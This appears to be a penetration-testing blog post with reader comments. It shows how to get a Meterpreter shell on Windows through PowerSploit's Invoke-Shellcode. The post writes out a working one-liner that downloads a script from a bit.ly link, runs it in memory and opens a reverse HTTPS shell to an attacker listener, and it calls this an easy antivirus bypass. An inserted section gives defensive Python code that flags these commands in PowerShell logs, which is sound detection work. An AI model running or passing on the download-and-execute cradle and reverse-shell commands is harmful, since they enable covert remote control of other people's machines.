PowerSploit: The Easiest Shell You’ll Ever Get
Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.
PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET so you may already be using it! Many of the scripts in the project are extremely useful in post-exploitation in Windows environments. The PowerSploit project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode.
In order for PowerSploit to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let's automate it with a really simple Python script:
To start the multi/handler and configure it for PowerSploit, we just run the script:
python StartListener.py 192.168.0.15 443
Now that our handler is ready, we can move on to executing our shell. The first thing I did to make the next step easier to type was shorten the GitHub link to Invoke-Shellcode with bit.ly:
Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the PowerSploit function and pass it to Invoke-Expression to put it into memory:
IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c')
Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.15 -Lport 443 -Force
We can actually combine these commands to run a single command to execute our shell:
IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.0.1.200 -Lport 443 -Force
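The one-liner above is the classic PowerShell "download cradle": a .NET WebClient fetches script text over HTTP and IEX runs it straight from memory, so nothing touches disk for AV to scan. From the defender's side, what does touch a log is the script text itself once PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) is turned on. The following is an added example, not code from the post or from PowerSploit, showing a small scorer that flags script blocks containing the cradle, Invoke-Shellcode and the Meterpreter payload string. The sample script blocks, indicator weights and alert threshold are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of script block text as it would appear in 4104 events
# pulled from a SIEM. These lines are made up for this example; the second
# one mirrors the one-liner from the post.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); "
    "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.0.1.200 -Lport 443 -Force",
    "Invoke-Expression (New-Object System.Net.WebClient).DownloadString(\"https://example.invalid/x.ps1\")",
    "$wc = New-Object Net.WebClient; $wc.DownloadFile('https://example.invalid/report.csv', 'C:\\temp\\report.csv')",
]

# Each indicator: (name, compiled regex, weight). Weights are assumed values
# chosen for this example, not taken from any vendor ruleset.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 2),
    ("webclient_download_string", re.compile(r"Net\.WebClient\)?\s*\.\s*DownloadString", re.I), 3),
    ("invoke_shellcode", re.compile(r"\bInvoke-Shellcode\b", re.I), 5),
    ("meterpreter_payload", re.compile(r"windows/meterpreter/\w+", re.I), 5),
    ("url_shortener", re.compile(r"https?://(bit\.ly|tinyurl\.com|t\.co|goo\.gl)/", re.I), 2),
]

ALERT_THRESHOLD = 5  # assumed: a score at or above this raises an alert

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


@dataclass
class Finding:
    score: int
    indicators: list
    urls: list
    alert: bool


def analyze_script_block(text: str) -> Finding:
    """Score one script block; returns which indicators fired and any URLs seen."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # The cradle is "download + execute in memory": IEX fed by DownloadString.
    # The pairing is more suspicious than either piece alone, so it gets a bonus.
    if "invoke_expression" in hits and "webclient_download_string" in hits:
        hits.append("download_cradle")
        score += 3
    urls = URL_RE.findall(text)  # URLs are what an analyst pivots on next
    return Finding(score, hits, urls, score >= ALERT_THRESHOLD)


def scan(blocks):
    """Score a batch of script blocks in order."""
    return [analyze_script_block(b) for b in blocks]


if __name__ == "__main__":
    for block, f in zip(SAMPLE_SCRIPT_BLOCKS, scan(SAMPLE_SCRIPT_BLOCKS)):
        flag = "ALERT" if f.alert else "ok   "
        print(f"{flag} score={f.score:2d} {f.indicators} {block[:60]}")
```

A plain DownloadFile of a CSV (the fourth sample) scores zero, which is the point of weighting the IEX/DownloadString pairing rather than alerting on WebClient alone: the cradle is the behaviour worth catching, and it survives the obvious evasion of renaming the bit.ly link. Without script block logging enabled, none of this text is recorded, so that setting is the prerequisite for any of it.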
Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:
That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on Twitter. Also, join me at Derbycon, where I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall, and about how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there!
-Chris
Uhhhhhhhhh…..
Why did you put your IP in that server start command? Cause…. That’s REALLY not secure.
*I think it should be “127.0.0.1 443” which is the local host address.
-McFlyAF
Hi,
Actually tried your trick, it did not work: -Payload doesn't exist after reading raw shell code from GitHub! Maybe it changed?
Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.
At line:53 char:6
+ throw <<<< 'Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.'
+ CategoryInfo : OperationStopped: (Something terri…and execute it.:String) [], RuntimeException
+ FullyQualifiedErrorId : Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.
Really impresses me seeing someone use PowerShell for pen testing. I just wish there were more people, as this subject seems to be pretty scarce within the PowerShell community.
Any more good resources you can recommend?
I thought it was awesome that PowerShell will download a webpage and store it as a string that you could later execute, so I wrote a quick script based off this. It will allow you to pick a URL where a PowerShell script is held and then execute it. Or it will host a script on a basic Ruby webserver that can be either HTTP or HTTPS.
https://github.com/b00stfr3ak/fast_meterpreter